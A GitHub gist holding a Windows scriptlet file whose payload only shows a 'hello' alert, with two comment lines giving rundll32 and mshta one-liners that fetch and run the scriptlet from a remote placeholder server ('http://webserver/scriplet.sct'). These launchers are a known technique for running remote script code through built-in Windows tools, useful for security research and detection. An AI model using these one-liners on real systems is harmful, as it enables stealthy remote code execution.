Skip to content

Instantly share code, notes, and snippets.

@agreenjay
Last active July 17, 2018 22:59
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save agreenjay/d45b51d7dafa79c12be6c832db71f7b3 to your computer and use it in GitHub Desktop.
Save agreenjay/d45b51d7dafa79c12be6c832db71f7b3 to your computer and use it in GitHub Desktop.
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
window.alert("hello");
]]>
</script>
</scriptlet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment